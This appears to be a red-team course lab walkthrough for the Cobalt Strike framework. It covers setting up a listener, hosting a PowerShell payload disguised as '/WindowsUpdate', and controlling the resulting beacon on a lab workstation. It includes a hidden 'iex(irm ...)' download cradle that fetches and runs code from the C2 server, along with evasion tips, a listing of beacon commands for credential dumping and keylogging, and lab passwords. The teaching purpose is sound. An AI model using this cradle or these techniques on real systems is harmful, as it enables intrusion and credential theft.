Lab 2.2 : Cobalt Strike Framework
Objectives
- Review the features of Cobalt Strike
- Create a listener
- Create a payload and host it on the C2 server
- Execute the payload in the target environment
- Interact with the Beacon
- Explore Cobalt Strike modules
This lab will introduce you to Cobalt Strike, arguably the most used command and control framework in the world. Cobalt Strike is a licensed product, originally developed by Raphael Mudge and is now maintained and managed by Fortra. As Cobalt Strike is a licensed product, we are only interacting to the Cobalt Strike server through its GUI client. Cobalt Strike is heavily focused on Windows environments, it has a "Linux beacon" but it is extremely limited.
Preparation
Preparation Steps
Ensure you are connected to the VPN and can ping from the Slingshot Linux VM to the draconem.io website.
Open a terminal on Slingshot. Connect to the VPN with openvpn and take note of your ip address:
sudo openvpn ~/Desktop/sec565-labs-range.ovpn
Ctrl+Shift+t to open a new terminal tab, then run the following command to create four ICMP packets :
ping -c 4 draconem.io
If you get a successful ping, then curl the website. The ping tests icmp while the curl tests dns, tcp, and http.
curl draconem.io | head

On Your Own
- Create a Cobalt Strike listener
- Create a Scripted Web delivery payload in Cobalt Strike
- Execute the launcher in the target environment on wk01
- Ensure communication works properly
- Review the walkthrough
Walkthrough
Warning
Remember that the IP address of your Slingshot VM may be different than what you see in screenshots and instructions. Please substitute your specific IP address on the tun0 adapter as needed.
Launch Cobalt Strike
The cobalt strike client can be found on the student instance, which can be reached via guacamole only. The credentials are:
- url: http://10.130.2.22:8080/guacamole
- username:
student - password:
Sec565!!
If you need to copy paste commands, you can do so by opening the guacamole menu. On a Windows device, the Guacamole menu is displayed by pressing Ctrl + Alt + Shift. On a Mac, the Guacamole menu is displayed by pressing Ctrl ^ + Command ⌘ + Shift.
A new guacamole menu will appear in which you'll be able to paste your text. afterwards you'll be able to paste the text of the guacamole menu in your guacamole session, just like any normal paste.
1. Start the Cobalt Strike client by navigating to C:\Tools\cobaltstrike and double clicking the cobaltstrike application.

2. In the client please fill in the following values:
- Host:
10.130.4.100 - select a username that you really like (or keep
Neo, if you like being the chosen one). - As password, please fill in the following
sec565@!
If everything looks OK, click the Connect button.

A new popup will appear if this is the first time connecting to the server regarding a fingerprint verification, which you should accept.

Create Listener
A command and control server is useless if we do not listen for new incoming connections,let's fix that right now.
In Cobalt Strike there are multiple ways to setup a listener.
3. The easiest way by far is to click the headset button in the client.
Another approach is to click Cobalt Strike on the top of the client and then select Listeners.

4. A new tab is now going to open in the bottom half of your client called Listeners, go ahead and click the Add button.
A New Listener pop up dialog should appear where you can give the Listener a bunch of options, let's walk over some of them:
Name: The name of the listener, pick something descriptive for example HTTPS-Short or DNS-LongPayload: This is what type of payload the listener should expect, there are a bunch of options here as Cobalt Strike supports:Peer-to-peerconnections overTCPorSMB.- Can communicate to the internet over
DNS,HTTPorHTTPS. - There is also support for metasploit through
Foreignlisteners - Finally, the concept of
externalC2which allows you to create your own command and control channel that will interface with Cobalt Strike.
Cobalt Strike supports host rotation as well, This will make sure that the beacon will rotate hosts on a predefined set of rules. It can be set to Random or set as a fallback mechanism. Not only does this help reduce indicators of compromise as the beacon will not phone home to the same IP all the time, it also makes it more robust in case one of your IPs or domain names get blacklisted.
5. For this exercise, go ahead and create a new HTTPS listener:

Name:HTTPS-ShortPayload:Beacon HTTPSHTTPS Hosts:10.130.4.100(you need to add it by clicking the + button on the right)HTTPS Host (Stager):10.130.4.100HTTPS Port (C2):8443(443 is already bound on that host to another process)
Press the Save button, if all went well a new Listener should be registered and visible in the Listeners tab.

Create Launcher
Cobalt Strike supports multiple file extensions to generate payloads, ranging from binaries to raw shellcode to PowerShell scripts and yes... even Macros!
The easiest way to infect a victim is by execution of a PowerShell Script.
Cobalt Strike Allows you to generate a malicious script to execute Beacon and host it on the Cobalt Strike server at the same time.
6. This can be done by navigating to the Attacks tab in the top of your client and selecting Scripted Web Delivery (S).
A new pop up should appear. In this pop up you can fill in the URI path that you wish, it defaults to /a.
7. Please check and fill in the following values:
URI Path:/WindowsUpdate(or something to your choosing, as long as you don't leave the default /a #BadOpsec)Local Host::10.130.4.100Local Port::8888(80 and is bound already)Listener::HTTPS-Short(the listener we just created in previous step, can be selected by pressing the...button)Type:PowerShellX64: Tick the checkbox (should be ticked already by default)
Press the Launch Button.

A new Dialogue should appear with the url that you can copy paste.

In case you would ever forget the URL or accidentally copied something else, you can always automatically copy the URL back to your clipboard by going to Site Management -> Manage on top of your Cobalt Strike Client.
This is going to open a new Sites tab, where you can select the payload and press the Copy URL button.

Opsec
It is not smart to take the approach we are showing in this exercise in a stealthy red team.
Hosting a malicious PowerShell script directly on the server exposes the IP of the server in case the SOC catches wind of your engagement.
A better way to do this would be to have a separate "staging" server that is hardened for example using rewrite conditions based on URL and user agents, it is also smart to modify the generated script so static detections can be bypassed.
Executing our Beacon
Time to launch our Beacon. please rdp into wk01 by opening up a terminal on your slingshot
xfreerdp +clipboard /cert-ignore /u:Gareth.Kilgallen /p:Hu825meapvsAq#Rx /v:wk01.draconem.corp
8. Open a command prompt by clicking the windows icon in the lower left and typing cmd.exe. Then paste the download cradle
powershell.exe -nop -w hidden -c "iex(irm -useb http://10.130.4.100:8888/WindowsUpdate)"
and press Enter.
The window should disappear and a new beacon should check in and register on the C2.
![]()
Interacting with our beacon
When not using a Malleable Profile (a file that can change the way Cobalt Strike beacons behave, that has to be set on the server side.), Cobalt Strike falls back to default values.
By default, Cobalt Strike beacons will sleep for 1 minute, for the sake of this lab, let's change that behavior and make our shorthaul interactive for a while.
9. Double click on the Beacon in your Cobalt Strike client, a new Beacon tab will open up on the bottom half of the client.
In this window, you can execute commands to interact with the beacon. Cobalt strike has a lot of built in commands, let's list them by simply typing a ? in the beacon> window then pressing enter.

The full output of the command is listed below, for future refference:
beacon> ?
Beacon Commands
===============
Command Description
------- -----------
! Run a command from the history
argue Spoof arguments for matching processes
blockdlls Block non-Microsoft DLLs in child processes
browserpivot Setup a browser pivot session
cancel Cancel a download that's in-progress
cd Change directory
checkin Call home and post data
chromedump Recover credentials from Google Chrome
clear Clear beacon queue
clipboard Attempt to get text clipboard contents
connect Connect to a Beacon peer over TCP
covertvpn Deploy Covert VPN client
cp Copy a file
dcsync Extract a password hash from a DC
desktop View and interact with target's desktop
dllinject Inject a Reflective DLL into a process
dllload Load DLL into a process with LoadLibrary()
download Download a file
downloads Lists file downloads in progress
drives List drives on target
elevate Spawn a session in an elevated context
execute Execute a program on target (no output)
execute-assembly Execute a local .NET program in-memory on target
exit Terminate the beacon session
file_browser Open the file browser tab for this beacon
getprivs Enable system privileges on current token
getsystem Attempt to get SYSTEM
getuid Get User ID
hashdump Dump password hashes
help Help menu
history Show the command history
inject Spawn a session in a specific process
inline-execute Run a Beacon Object File in this session
jobkill Kill a long-running post-exploitation task
jobs List long-running post-exploitation tasks
jump Spawn a session on a remote host
kerberos_ccache_use Apply kerberos ticket from cache to this session
kerberos_ticket_purge Purge kerberos tickets from this session
kerberos_ticket_use Apply kerberos ticket to this session
keylogger Start a keystroke logger
kill Kill a process
link Connect to a Beacon peer over a named pipe
logonpasswords Dump credentials and hashes with mimikatz
ls List files
make_token Create a token to pass credentials
mimikatz Runs a mimikatz command
mkdir Make a directory
mode dns Use DNS A as data channel (DNS beacon only)
mode dns-txt Use DNS TXT as data channel (DNS beacon only)
mode dns6 Use DNS AAAA as data channel (DNS beacon only)
mv Move a file
net Network and host enumeration tool
note Assign a note to this Beacon
portscan Scan a network for open services
powerpick Execute a command via Unmanaged PowerShell
powershell Execute a command via powershell.exe
powershell-import Import a powershell script
ppid Set parent PID for spawned post-ex jobs
printscreen Take a single screenshot via PrintScr method
process_browser Open the process browser tab for this beacon
ps Show process list
psinject Execute PowerShell command in specific process
pth Pass-the-hash using Mimikatz
pwd Print current directory
reg Query the registry
remote-exec Run a command on a remote host
rev2self Revert to original token
rm Remove a file or folder
rportfwd Setup a reverse port forward
rportfwd_local Setup a reverse port forward via Cobalt Strike client
run Execute a program on target (returns output)
runas Execute a program as another user
runasadmin Execute a program in an elevated context
runu Execute a program under another PID
screenshot Take a single screenshot
screenwatch Take periodic screenshots of desktop
setenv Set an environment variable
shell Execute a command via cmd.exe
shinject Inject shellcode into a process
shspawn Spawn process and inject shellcode into it
sleep Set beacon sleep time
socks Start/Stop a SOCKS4a/SOCKS5 server to relay traffic
spawn Spawn a session
spawnas Spawn a session as another user
spawnto Set executable to spawn processes into
spawnu Spawn a session under another process
spunnel Spawn and tunnel an agent via rportfwd
spunnel_local Spawn and tunnel an agent via Cobalt Strike client rportfwd
ssh Use SSH to spawn an SSH session on a host
ssh-key Use SSH to spawn an SSH session on a host
steal_token Steal access token from a process
timestomp Apply timestamps from one file to another
unlink Disconnect from parent Beacon
upload Upload a file
windows_error_code Show the Windows error code for a Windows error code number
10. One of the commands is the sleep command, which modifies how long a beacon should sleep, we can find out more information about the sleep command by typing help sleep

11. Let's make our beacon interactive by typing sleep 0
After a few seconds (60 at most), beacon should become interactive. You can validate this because the last column in the beacon overview on the top of the client will refresh very quickly.

12. Go ahead and execute some built-in commands like:
pspwdgetuid
We can also execute shell commands using shell or PowerShell commands using Powershell, for example:
shell net localgroup administratorspowershell get-service
13. Cobalt Strike also has built-in file browsing capabilities.
Right click your beacon in the beacon overview on the top side of the client and select Explore -> File Browser .
A new tab will open showing you a GUI file browser of the infected victims file system!

14. When you are done operating in the beacon you can type the exit command to stop the agent from checking back in.
any "dead" or inactive beacons can be removed by right clicking on them in the Cobalt Stike UI and selecting "Remove".
Tracking IOCs
Cobalt Strike has built-in reporting capabilities.
Feel free to generate some and inspect them at your leisure!
You can download them by navigating to the Reporting tab on the top of your Cobalt Strike client.
Conclusion
In this lab we explored another command and control framework. We created a listener and a PowerShell launcher. We RDP'd directly into the environment and used a download cradle to retrieve and execute our launcher. We explored a few of the tasks/modules that the framework provides including how to transform our shorthaul into an interactive haul instead.